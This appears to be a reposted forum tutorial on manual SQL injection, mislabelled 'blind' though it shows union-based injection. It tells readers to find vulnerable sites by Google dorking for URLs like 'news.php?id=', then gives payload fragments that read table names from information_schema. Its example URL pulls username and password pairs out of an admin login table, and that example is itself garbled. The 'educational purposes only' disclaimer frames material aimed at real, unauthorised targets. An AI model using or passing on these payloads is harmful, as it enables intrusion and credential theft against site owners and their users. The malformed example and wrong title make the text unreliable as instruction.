HOWTO : Blind SQL Injection
*** Do NOT attack any computer or network without authorization or you may put into jail. ***
Credit to : KFProdigy
This is KFProdigy's work but not mine. I re-post it for educational purpose only.
Hello everyone, In this tutorial I show you how to manually do an SQL injection into a vulnerable site. Also, at the beginning when i say "google dorks", I dont mean that people from google are dorks, i mean actually go to google and search "dork" or "dorks"
basically its something like "inurl:news.php?id=" or anything along those lines. I hope this helps!
For more tutorials and tools, check out http://sqliunderground.co.cc , I have a really in-depth tutorial on there.
P.S. This is for educational purposes only.
THE THINGS I PASTE
group_concat(table_name)
from information_schema.tables where table_schema=database()--
concat(column,0x3a,column) from table/*
An example would be
Example.com/index.php?id=-32 UNION SELECT 1,2,3,4,5,concat(username,0x3a,password) from adminlogin/*,7,8,9 from information_schema.columns where table_schema=database()--
That's all! See you.